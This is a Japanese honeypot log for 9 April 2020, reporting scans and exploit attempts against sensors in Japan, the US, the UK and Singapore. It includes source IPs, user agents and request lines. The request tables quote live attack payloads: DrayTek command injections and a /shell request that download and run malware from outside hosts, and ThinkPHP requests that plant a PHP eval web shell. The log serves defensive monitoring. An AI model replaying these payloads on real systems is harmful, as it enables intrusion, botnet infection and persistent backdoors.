ハニーポット(仮) 観測記録 2020/04/09分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
R4ducuによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 194.15.36.96/jaws; sh /tmp/jaws
Location:US
DrayTek製品の脆弱性を狙うアクセス
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
FreePBXに対するログイン試行するアクセス
110[.]249[.]212[.]46に関する不正通信
を確認しました。
Location:UK
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 194.15.36.96/jaws; sh /tmp/jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
110[.]249[.]212[.]46に関する不正通信
112[.]124[.]42[.]80に関する不正通信
を確認しました。
他
アクセス数推移
JP:総アクセス数:91 (前日比:+41)
US:総アクセス数:30 (前日比:-15)
UK:総アクセス数:64 (前日比:+19)
SG:総アクセス数:32 (前日比:-85)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.77.107.52 | United States |
| 34 | 44.225.84.206 | United States |
| 1 | 45.13.93.90 | Germany |
| 3 | 45.43.18.112 | United States |
| 1 | 45.56.78.64 | United States |
| 1 | 79.166.69.16 | Greece |
| 1 | 83.97.20.196 | Romania |
| 2 | 91.199.118.136 | Germany |
| 17 | 93.174.93.91 | Netherlands |
| 1 | 114.239.205.222 | China |
| 10 | 139.199.187.75 | China |
| 1 | 162.243.129.25 | United States |
| 1 | 162.243.129.40 | United States |
| 1 | 169.197.108.42 | United States |
| 1 | 178.128.194.144 | Germany |
| 2 | 185.153.197.100 | Republic of Moldova |
| 1 | 186.4.212.142 | Ecuador |
| 1 | 187.211.25.27 | Mexico |
| 1 | 188.65.168.35 | France |
| 10 | 218.201.82.168 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15' |
| 1 | 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' |
| 28 | - |
| 14 | AWS Security Scanner |
| 5 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | R4ducu |
| 1 | polaris botnet |
| 17 | python-requests/2.9.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 | ||
| 10 | \x16\x03\x01 | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 2 | CONNECT | www[.]gstatic[.]com/:443 | HTTP/1.1 |
| 1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 2 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 1 | GET | /access/ | HTTP/1.1 |
| 1 | GET | /db/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /dbadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /dbgeng.dll | HTTP/1.1 |
| 2 | GET | /elrekt.php | HTTP/1.1 |
| 2 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /myadmin/scripts/setup.php | HTTP/1.0 |
| 1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /mysql/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /mysqladmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/db___.init.php | HTTP/1.1 |
| 2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/db___.init.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.0 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.0 |
| 1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books/ | HTTP/1.1 |
| 1 | GET | /scripts/setup.php | HTTP/1.1 |
| 1 | GET | /setup.php | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws | |
| 1 | GET | /sqladm/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /sqladmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
| 2 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.8.10.202 | Russia |
| 1 | 45.13.93.90 | Germany |
| 1 | 45.143.221.47 | Netherlands |
| 3 | 47.93.189.84 | China |
| 3 | 60.205.176.113 | China |
| 1 | 73.243.138.186 | United States |
| 6 | 81.169.244.50 | Germany |
| 2 | 83.110.147.165 | United Arab Emirates |
| 1 | 84.228.42.10 | Israel |
| 1 | 89.218.91.182 | Kazakhstan |
| 1 | 110.249.212.46 | China |
| 3 | 116.255.175.35 | China |
| 1 | 162.243.130.216 | United States |
| 1 | 162.250.123.35 | United States |
| 1 | 167.250.194.17 | Costa Rica |
| 1 | 172.105.89.161 | United States |
| 1 | 185.153.197.102 | Republic of Moldova |
| 1 | 192.241.239.192 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 15 | - |
| 2 | Go-http-client/1.1 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | XTC |
| 3 | XTC BOTNET |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.12.1.el7.x86_64 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | \x03 | ||
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | GET | //admin/config.php?password%5B0%5D=ZIZO&username=admin | HTTP/1.1 |
| 1 | GET | /cards | HTTP/1.1 |
| 5 | GET | /horde/imp/test.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /login?from=-NAN | HTTP/1.1 |
| 4 | GET | /login?from=0.000000 | HTTP/1.1 |
| 5 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | http[:]//110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | HEAD | /Content/Images/Graph/logo_kugame.png | HTTP/1.1 |
| 4 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 2 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 5.8.10.202 | Russia |
| 6 | 5.101.0.209 | Russia |
| 1 | 5.182.211.230 | Netherlands |
| 1 | 13.77.107.52 | United States |
| 1 | 24.171.248.116 | Puerto Rico |
| 3 | 39.106.67.35 | China |
| 1 | 45.174.220.57 | Brazil |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 74.120.200.170 | United States |
| 1 | 77.49.141.188 | Greece |
| 1 | 85.93.20.170 | Germany |
| 3 | 93.46.112.134 | Italy |
| 26 | 106.13.62.145 | China |
| 3 | 106.13.92.110 | China |
| 3 | 118.178.179.13 | China |
| 1 | 128.14.134.134 | United States |
| 1 | 162.243.129.151 | United States |
| 1 | 162.243.132.30 | United States |
| 3 | 167.71.14.64 | United States |
| 1 | 173.177.208.208 | Canada |
| 2 | 185.153.197.102 | Republic of Moldova |
| 1 | 208.80.208.100 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 22 | - |
| 2 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 |
| 26 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 2 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | |||
| 4 | - | ||
| 3 | \x03 | ||
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 1 | GET | /cards | HTTP/1.1 |
| 1 | GET | /dashboard.action | HTTP/1.1 |
| 1 | GET | /db | HTTP/1.1 |
| 4 | GET | /horde/imp/test.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('spread.php','%3C?php%20@eval($_POST%5Bspread%5D);?%3E') | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E | HTTP/1.1 |
| 1 | GET | /index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B1%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E | HTTP/1.1 |
| 1 | GET | /index.php?s=index/%5Cthink%5CRequest/input&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E | HTTP/1.1 |
| 1 | GET | /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E | HTTP/1.1 |
| 1 | GET | /index.php?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E | HTTP/1.1 |
| 1 | GET | /index.php?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E | HTTP/1.1 |
| 1 | GET | /login.action | HTTP/1.1 |
| 1 | GET | /login.do | HTTP/1.1 |
| 3 | GET | /login?from=-NAN | HTTP/1.1 |
| 1 | GET | /login?from=0.000000 | HTTP/1.1 |
| 1 | GET | /login_login.action | HTTP/1.1 |
| 3 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /news.action | HTTP/1.1 |
| 4 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws | |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /verifylogin.do | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 2 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
| 3 | POST | /index.php/?s=captcha | HTTP/1.1 |
| 2 | POST | /spread.php | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 5.8.10.202 | Russia |
| 1 | 45.13.93.90 | Germany |
| 1 | 45.43.18.112 | United States |
| 1 | 60.191.52.254 | China |
| 1 | 85.93.20.170 | Germany |
| 2 | 91.199.118.136 | Germany |
| 3 | 106.14.219.132 | China |
| 3 | 110.249.212.46 | China |
| 3 | 121.43.236.217 | China |
| 3 | 156.67.218.176 | Singapore |
| 1 | 162.243.129.233 | United States |
| 1 | 162.243.130.107 | United States |
| 2 | 162.250.123.35 | United States |
| 1 | 169.197.108.6 | United States |
| 1 | 180.175.193.144 | China |
| 2 | 185.153.197.101 | Republic of Moldova |
| 1 | 189.145.103.84 | Mexico |
| 3 | 221.229.208.253 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 21 | - |
| 5 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | XTC BOTNET |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | \x03 | ||
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 2 | CONNECT | www[.]gstatic[.]com/:443 | HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 1 | GET | /cards | HTTP/1.1 |
| 1 | GET | /db | HTTP/1.1 |
| 4 | GET | /horde/imp/test.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 4 | GET | /login?from=0.000000 | HTTP/1.1 |
| 4 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.0 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 3 | GET | http[:]//110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 2 | HEAD | /Content/Images/Graph/logo_kugame.png | HTTP/1.1 |
| 1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
